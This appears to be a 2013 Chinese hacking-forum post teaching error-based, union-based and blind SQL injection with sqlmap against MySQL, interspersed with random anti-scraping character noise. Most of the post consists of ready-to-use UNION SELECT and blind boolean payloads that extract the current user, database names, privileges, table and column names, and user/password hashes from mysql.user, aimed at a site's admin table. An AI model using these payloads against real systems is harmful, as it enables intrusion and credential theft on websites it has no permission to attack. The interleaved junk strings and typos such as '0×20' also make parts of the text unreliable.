放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。& A0 ?* R# C& m$ H% l. V# E- E
3 t8 O$ ^* L+ H' n这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表+ X, g% y* B" L
- L& B, N& b1 J& `% }分类标准 分类 备注# ~* c9 E9 j' ?8 q/ I
按字段类型 整型注入,字符型注入 6 y- w* _* C6 J B' @
按出现的位置 get注入,post注入,cookie注入,http header注入
: t& t+ g# \) p' ]# u然而高级注入是这样的7 P" A1 e4 ~. Z$ |) e4 W# F
v+ [) M- H% q5 M高级注入分类 条件
9 P/ b. F1 e9 L" u+ C5 W+ Jerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
3 q1 Z! x& O* {$ m! E' W+ ^union-based sql 能够使用union,存在数据库,表结构
, q) m6 ~+ f6 kblind sql 存在注入
* u( B( B* t c3 T4 C: `! P0 c我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
# L6 q: I" U! C& m- D' k
" S q) Z/ Z. B( G+ }- b好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
{* b( h6 R7 }5 R6 w6 b8 k
& s5 T/ s/ E" v3 a4 |# Z2 F附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。$ R! G7 }, d7 I( U9 A k4 T
) @0 z3 y7 K3 ^3 M/ M这里用mysql说明
5 D3 ?9 p4 c8 K5 \8 K , T/ W! z, x7 m1 f* F9 Y- F! @
e注入坛子里很多了,请看戳我或者再戳我
! H; [* D' q+ X3 \, W6 J + S( D6 q5 l0 b: S: ^ P' T
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
G! y8 T& n. ~ x, j d; ?" f: w" K" P
获取当前数据库用户名' e! W' C5 H5 T7 E
8 @/ Y' h9 N& KUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C# u, A( B1 G% [: m1 I
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
6 N* b$ p1 N- f& E, C YL, NULL#
' ]1 q% O( O% s) F7 C. z/ t; m注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
' Z+ S% e/ W& Q
; F; K7 i! l W" M |获取数据库名, l. l. x2 t1 U" w
3 B" n% i% ]) X
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
6 ]! D. ^3 i( x, g获取所有用户名: x; n7 [, l! A# p( c
$ y% _; H- c- h7 z8 S' o1 T: E* Q
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
& M- O- f. G5 E# D3 E查看当前用户权限
3 j1 b' ~4 X, v0 U + T# M% E) S% ]8 P z! Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
% T2 h* T/ E' S \2 h) W- ]尝试获取密码,当然需要有能读mysql数据库的权限
, B+ Z6 h8 D t$ u- Z R7 l % X7 S' a+ s8 m; L x
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#$ n! C' @) l3 ?& i3 _8 U8 W$ R
获取表名,limit什么的自己搞啦
/ S$ ]! S! S" f* w8 R6 o" v + X6 t% G! i) l7 Z! }
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
! t% X* c1 G3 }6 z8 B获取字段名及其类型
" G1 I3 |3 z) Z6 ]. U h8 p3 wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#0 ] r( G+ r4 A, f( t
8 Y, S6 H0 ^' F+ g! T/ Wb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
$ F' D$ \* @% }+ X1 d . X# T- R# ~( a2 b, H( b4 l0 n& c
如: l* Q9 V! e+ A* y6 a
获取当前用户名
/ f' [, m- M/ C" B7 _4 h& N; [0 y
1 G3 K' e+ E: i* C" EAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
5 {( d" X1 R3 G' e: G$ v获取当前数据库1 p4 }, b6 n2 Y6 ~
5 ]0 j/ R1 n2 oAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
8 _( J* y6 E) L6 P9 s" |获取表名
7 Y8 D& N+ _ U+ B2 ~' a ; o$ N& L3 |% J+ g
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
( j9 |( k2 G/ _3 s获取字段名及其类型和爆内容就不说了,改改上面的就可以了。1 S) t: y" o* c2 ]6 B
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。5 _$ Q( g' }5 ^$ G
爆表
6 ~$ z" k& t. {9 Y. h
3 i" {1 \$ C: E0 h* Y' {+ F8 oAND EXISTS(select * from table)
% p2 F& k: s0 V+ I9 l$ j爆字段8 {- I$ E% b+ x( E7 A
, I9 w: H- T* @) J* @AND EXISTS(select pwd from table)5 S; b1 d& `( q" ]: a
盲注的变化就比较多了,由于篇幅,只是举个例子而已。. ]2 R9 s" z* m6 x
, D2 O; s% q3 E0 v! X本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。( f/ C# D% j; V4 n
|
发表于 2013-7-16 20:31:26
收藏
支持
反对